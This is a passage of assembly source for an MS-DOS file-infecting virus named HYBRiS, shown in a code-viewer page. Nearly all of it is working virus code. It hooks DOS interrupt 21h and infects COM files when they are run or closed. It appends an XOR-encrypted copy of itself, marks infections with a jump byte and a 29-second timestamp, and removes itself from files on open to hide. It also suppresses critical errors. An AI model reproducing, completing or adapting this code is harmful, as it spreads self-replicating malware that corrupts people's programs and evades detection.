📄 hybris.asm
字号:
push dx
cmp bx,4 ;don't close null, aux and so
jbe no_close
call check_name ;es:di points to file name
add di,8 ;es:di points to extension
cmp word ptr es:[di],'OC'
jne no_close
cmp byte ptr es:[di+2],'M' ;es:di+2 points to 3rd char in extension
je close_infection
no_close:
pop dx ;no com-file being opened
pop ds
pop di
pop si
pop cx
pop bx
pop ax
pop bp
pop es
jmp do_oldint21h
close_infection:
or byte ptr es:[di-26h],2
mov cs:Closeflag,1 ;mark that 3e-infection = on
mov ax,4200h ;seek tof.
xor cx,cx
cwd
int 21h
jmp short infect_on_close ;infect it
check_name:
push bx
mov ax,1220h ;get job file table for handle at es:di
int 2fh
mov ax,1216h ;get system file table
mov bl,byte ptr es:[di] ;for handle index in bx
int 2fh
pop bx
add di,20h ;es:di+20h points to file name
ret ;return
infect:
push es
push bp
push ax
push bx
push cx
push si
push di
push ds
push dx
call setcritical ;install a critical error handler
mov cs:Closeflag,0 ;make sure closeflag is off
mov ax,4300h ;get attrib
int 21h
push cx ;save attrib onto the stack
mov ax,4301h ;clear attrib
xor cx,cx
int 21h
mov ax,3d00h ;open file in read mode only
int 21h
xchg ax,bx
mov ax,1220h
int 2fh
push bx
mov ax,1216h ;modify
mov bl,byte ptr es:[di]
int 2fh
pop bx
or byte ptr es:[di+2],2 ;to read & write mode in the SFT-entry
infect_on_close: ;entry for infection on 3eh
push cs ;cs=ds
pop ds
mov ax,5700h ;get time/date
int 21h
push cx ;save time/date onto the stack
push dx
mov ah,3fh ;read first four bytes to orgjmp
mov cx,4
mov dx,offset ds:orgjmp
int 21h
cmp word ptr ds:orgjmp,'ZM' ;check if .EXE file
je exe_file
cmp word ptr ds:orgjmp,'MZ'
je exe_file ;if so - don't infect
cmp byte ptr ds:orgjmp+3,'@' ;dont reinfect!
jne lseek_eof
jmp skip_infect
exe_file:
mov cs:exeflag,1 ;mark file as EXE-file, and
jmp short skip_infect ;don't set second value for it!
lseek_eof:
mov ax,4202h ;go end of file, offset in dx:cx
xor cx,cx ;and return file size in dx:ax.
xor dx,dx
int 21h
cmp ax,(0FFFFH-Vir_size) ;dont infect to big or
jae skip_infect ;to small files
cmp ax,(vir_size-100h)
jb skip_infect
add ax,offset entry_point-106h ;calculate entry offset to jmp
mov word ptr ds:newjmp[1],ax ;move it [ax] to newjmp
get_rnd:
mov ah,2ch ;get random number and put enc_val
int 21h
or dl,dl ;dl=0 - get another value!
je get_rnd
mov word ptr ds:enc_val,dx
mov ax,08d00h ;copy entire virus to 8d00h:100h
mov es,ax
mov di,100h
mov si,di
mov cx,(vir_size+1)/2
rep movsw
push es
pop ds
xor bp,bp ;and encrypt it there
call encrypt
mov ah,40h ;write virus to file from position
mov cx,virus_end-install ;08d00h:100h
mov dx,offset install
int 21h
push cs ;cs=ds
pop ds
mov ax,4200h ;go to beginning of file
xor cx,cx
cwd
int 21h
mov ah,40h ;and write a new-jmp-construct
mov cx,4 ;of 4 bytes (4byte=infection marker)
mov dx,offset newjmp
int 21h
skip_infect:
mov ax,5701h ;restore
pop dx ;date
pop cx ;time
cmp byte ptr cs:[exeflag],1 ;exe file?
je skip_sec ;if so - keep the sec_value intact
or cl,00011101b ;and give com-files second value
and cl,11111101b ;29
skip_sec:
int 21h
cmp byte ptr cs:[Closeflag],1 ;check if execute or close infeection,
je dont_close ;if infect on close, dont close file
close_file:
mov ah,3eh ;close the file which were executed
int 21h
pop cx ;get original file-attribs
dont_close:
pop dx ;ds:dx = filename
pop ds
cmp byte ptr cs:[Closeflag],1
je exit_close
mov ax,4301h ;set back saved attribute
int 21h
exit_close:
mov byte ptr cs:closeflag,0
call resetcritical ;set back critical error handler int24h
pop di
pop si
pop cx
pop bx
pop ax
pop bp
pop es ;restore registers in use
do_oldint21h:
O21h:
db 0eah ;jmp far ptr
org21ofs dw ? ;s:o to
org21seg dw ? ;int21h
ret ;call to DOS. . . return!
unload_vsafe:
mov ah,9
mov dx, offset v_name
push ds
push cs
pop ds
int 21h
pop ds
mov ax,4c00h ;exit program infected with an other
int 21h ;virus.
v_name db "[HYBRiS] (c) '95 =TU/IR=",'$'
closeflag db 0
exeflag db 0
activate_flag db 0
disinfect_dsdx:
push ax
push bx
push cx
push dx
push di
push si
push ds
push es ;save all regs/segs...
push ds
pop es ;ds=es
mov cx,64 ;scan for the dot which
mov di,dx ;seperates filename from
mov al,'.' ;extension
cld ;clear direction
repne scasb ;
jne nocom ;<- was no '.' in filename
;(aint likely a comfile)
cmp word ptr ds:[di],'OC'
je smallc
cmp word ptr ds:[di],'oc'
jne nocom
smallc:
cmp byte ptr ds:[di+2],'M'
je open_com
cmp byte ptr ds:[di+2],'m'
je open_com
nocom:
jmp no_com_opened ;no com-file being opened!
open_com:
mov ax,3d02h ;Tbav utils might intercept this
pushf ;action.
push cs
call o21h
xchg ax,bx
push cs ;cs=ds=es
pop ds
push cs
pop es
mov ax,5700h ;get time
int 21h
push cx
push dx
and cl,1fh ;see if seconds = 29
xor cl,1dh
jne close_dis ;its not! (file = not infected)
mov ah,3fh ;read first bytes of the infected
mov cx,4 ;program
mov dx,offset ds:orgjmp
int 21h
cmp byte ptr ds:orgjmp,0e9h ;first byte = jmp?
jne close_dis
cmp byte ptr ds:orgjmp+3,'@' ;fourth byte = '@'?
jne close_dis
mov ax,4202h ;opened file is infected,
mov cx,-1 ;seek the location where we
mov dx,-(virus_end-orgjmp) ;stored the first bytes of the
int 21h ;original program
mov ah,3fh ;read those bytes to orgjmp
mov cx,4
mov dx,offset ds:orgjmp
int 21h
mov ax,4200h ;seek the beginning of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write the original bytes to
mov dx,offset orgjmp ;the top of file
mov cx,4
int 21h
mov ax,4202h ;seek (endoffile-virussize)
mov cx,-1
mov dx,-(virus_end-install)
int 21h
mov ah,40h ;truncate file
xor cx,cx
int 21h
close_dis:
mov ax,5701h ;restore saved
pop dx ;date
pop cx ;and time
int 21h ;
mov ah,3eh ;close the file
pushf
push cs
call o21h
no_com_opened:
pop es
pop ds
pop si
pop di
pop dx
pop cx
pop bx
pop ax
bail_out:
jmp o21h ;and bail out!
random:
push ds
push bx
push cx
push dx
push ax
xor ax,ax
int 1ah
push cs
pop ds
in al,40h
xchg cx,ax
xchg dx,ax
mov bx,offset ran_num
xor ds:[bx],ax
rol word ptr ds:[bx],cl
xor cx,ds:[bx]
rol ax,cl
xor dx,ds:[bx]
ror dx,cl
xor ax,dx
imul dx
xor ax,dx
xor ds:[bx],ax
pop cx
xor dx,dx
inc cx
je random_ret
div cx
xchg ax,dx
random_ret:
pop dx
pop cx
pop bx
pop ds
or ax,ax
ret
SetCritical:
push ax ds
mov ax,9
mov ds,ax
push word ptr ds:[0]
push word ptr ds:[2]
pop word ptr cs:[OldCritical+2]
pop word ptr cs:[OldCritical]
mov word ptr ds:[0],offset CriticalError
push cs
pop word ptr ds:[02]
pop ds
pop ax
ret
ResetCritical:
push ax
push ds
push word ptr cs:[OldCritical]
mov ax,9
push word ptr cs:[OldCritical+2]
mov ds,ax
pop word ptr ds:[2]
pop word ptr ds:[0]
pop ds
pop ax
ret
CriticalError: ;new int24h handler
mov al,3 ;returns no error
iret
OldCritical dd 0 ;dw 0,0
ran_num dw ?
decrypt:
encrypt:
mov ax,word ptr ds:[bp+enc_val] ;enc value in ax
lea di,[bp+install] ;pointer to encryption start
mov cx,(encrypt-install)/2 ;number of words to be encrypted
xor_loopy:
xor word ptr ds:[di],ax
inc di
inc di
loop xor_loopy
ret
enc_val dw 0
entry_point:
call get_bp ;to get the delta offset
;classic old trick..
get_bp:
pop bp
sub bp, offset get_bp
call decrypt ;decrypt virus
jmp install ;jmp to install code
newjmp db 0e9h,00h,00h,'@' ;buffer to calculate a new entry
orgjmp db 0cdh,20h,00,00 ;buffer to save the 4 first bytes
virus_end:
end virus_start
================================================================================
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -